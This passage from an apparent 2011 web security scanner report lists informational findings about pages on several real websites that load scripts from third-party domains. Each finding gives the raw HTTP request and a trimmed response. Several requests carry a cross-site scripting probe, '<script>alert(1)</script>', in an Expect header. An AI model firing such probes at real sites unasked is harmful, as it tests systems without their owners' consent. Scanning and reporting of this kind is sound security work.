Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0e93660;expires=Mon, 02-May-11 03:03:50 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 mdw107102 (MII-APC/1.6)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
</script>

<script type="text/javascript" src="http://tracker.mattel.com/?hotwheelscollector"></script>
...[SNIP]...

24.30. http://www.japanator.com/elephant/login.phtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /elephant/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:55:17 GMT
Server: lighttpd/1.4.28
Content-Length: 47739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login | Japan
...[SNIP]...
<!-- End Quantcast tag -->


<SCRIPT TYPE="text/javascript" SRC="http://loadus.exelator.com/load/?p=218&g=002&c=153225"></SCRIPT>


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" ></script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js" ></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://dt9.destructoid.com/elephant/js/mrskinner.js" ></script>
...[SNIP]...
</iframe>
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<BR>


<script type="text/javascript" src="http://s28.sitemeter.com/js/counter.js?site=s28japanator">
</script>
...[SNIP]...

24.31. http://www.japanator.com/elephant/signup.phtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /elephant/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:06:57 GMT
Server: lighttpd/1.4.28
Content-Length: 46289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Signup for an
...[SNIP]...
<!-- End Quantcast tag -->


<SCRIPT TYPE="text/javascript" SRC="http://loadus.exelator.com/load/?p=218&g=002&c=153225"></SCRIPT>


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" ></script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js" ></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://dt9.destructoid.com/elephant/js/mrskinner.js" ></script>
...[SNIP]...
</iframe>
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<BR>


<script type="text/javascript" src="http://s28.sitemeter.com/js/counter.js?site=s28japanator">
</script>
...[SNIP]...

24.32. http://www.kxii.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kxii.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kxii.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Server-Name: sj-c14-r7-u38-b5
Content-Type: text/html;charset=utf-8
Date: Sun, 01 May 2011 23:06:02 GMT
Content-Length: 31215
Connection: close
Set-Cookie: click_mobile=0

<script type="text/javascript">
<!--
window.location = "http://www.kxii.com/sitemap"
//-->
</script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/1999/RE
...[SNIP]...
</script>
<script src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=200806280400" type="text/javascript" language="javascript1.3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

24.33. http://www.lenox.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lenox.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Server: Microsoft-IIS/5.0
Date: Sun, 01 May 2011 23:48:38 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=18008498;expires=Tue, 23-Apr-2041 23:48:39 GMT;path=/
Set-Cookie: CFTOKEN=3f48e32aae5ed302-ADF6BB1C-F0A7-563B-641D8D97D77EEE98;expires=Tue, 23-Apr-2041 23:48:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
       <head>

           <
...[SNIP]...
<div id="verisign_box"><script type="text/javascript" src="https://sealserver.trustwave.com/seal.js?style=normal"></script>
...[SNIP]...

24.34. http://www.mylovedpee.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedpee.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedpee.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:10:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8707
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:10:24 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Pee Pictures</title>
<!-
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

24.35. http://www.mylovedspy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedspy.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedspy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:51:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8666
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:51:48 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Spy Pictures</title>
<!-
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

24.36. http://www.mytattoogallery.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytattoogallery.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mytattoogallery.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 60219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   www.my
...[SNIP]...
</script>
<script language="javascript" src="http://as.casalemedia.com/sd?s=95308&f=1"></script>
...[SNIP]...

24.37. http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newswiretoday.com
Path:   /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/ HTTP/1.1
Host: www.newswiretoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=8kel0h54alrfeeq12er0b6lst4; path=/
Set-Cookie: phpjob_aff_id=0; expires=Mon, 01-Aug-2011 04:00:00 GMT
Set-Cookie: phpjob_lng=english; expires=Mon, 01-Aug-2011 04:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 45114

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Newswire / The Netherlands #1 Real Estate Company Selects OUTSCAN for Vulnerability Assessment and Management -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

24.38. http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-1.4.4.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newswiretoday.com
Path:   /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-1.4.4.min.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-1.4.4.min.js HTTP/1.1
Host: www.newswiretoday.com
Proxy-Connection: keep-alive
Referer: http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpjob_aff_id=0; phpjob_lng=english; PHPSESSID=cekfc38cl4o1p4aijb5c05v7u6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:31:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 45154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Newswire / The Netherlands #1 Real Estate Company Selects OUTSCAN for Vulnerability Assessment and Management -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

24.39. http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-ui-1.8.7.custom.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newswiretoday.com
Path:   /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-ui-1.8.7.custom.min.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-ui-1.8.7.custom.min.js HTTP/1.1
Host: www.newswiretoday.com
Proxy-Connection: keep-alive
Referer: http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpjob_aff_id=0; phpjob_lng=english; PHPSESSID=cekfc38cl4o1p4aijb5c05v7u6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:31:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 45197

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Newswire / The Netherlands #1 Real Estate Company Selects OUTSCAN for Vulnerability Assessment and Management -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

24.40. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Navigation.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:25:38 GMT
Content-Length: 7841
Content-Type: text/html
Cache-control: private

   
<html>
<head>
<title>Xtreme Powersports' Check Out Navigation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript"
src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js"
type="text/javascript">
</script>
...[SNIP]...

24.41. http://www.ronniesmailorder.com/fiche_select1.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select1.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:06:17 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; path=/
Vary: Accept-Encoding
Content-Length: 483234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<SCRIPT src="http://www.psnnewsletter.com/psnpopup.js" LANGUAGE="JavaScript"></SCRIPT>
<script src="http://www.powersportsnetwork.com/flash_loader.js" language="javascript"></script>
<script src="http://www.powersportsnetwork.com/jquery_min.js" language="javascript"></script>
...[SNIP]...

24.42. http://www.seoq.com/ajaxAction.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /ajaxAction.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ajaxAction.php?url=onlinemicrofiche.com&sid=0.2201897264458239 HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:28:43 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:28:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.43. http://www.seoq.com/quotient/2011/04/22/1797/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/04/22/1797/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...

24.44. http://www.seoq.com/quotient/2011/04/22/1798/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/04/22/1798/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:36 GMT
Server: Apache
Set-Cookie: CAKEPHP=dlhq4kuanqfrjgsc9kmcb01m25; expires=Mon, 09-May-2011 02:48:38 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dlhq4kuanqfrjgsc9kmcb01m25; expires=Mon, 09-May-2011 02:48:38 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...

24.45. http://www.seoq.com/quotient/2011/04/22/2270/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/04/22/2270/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:52 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:53 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...

24.46. http://www.seoq.com/quotient/2011/04/22/2271/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/04/22/2271/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:19 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:49:19 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...

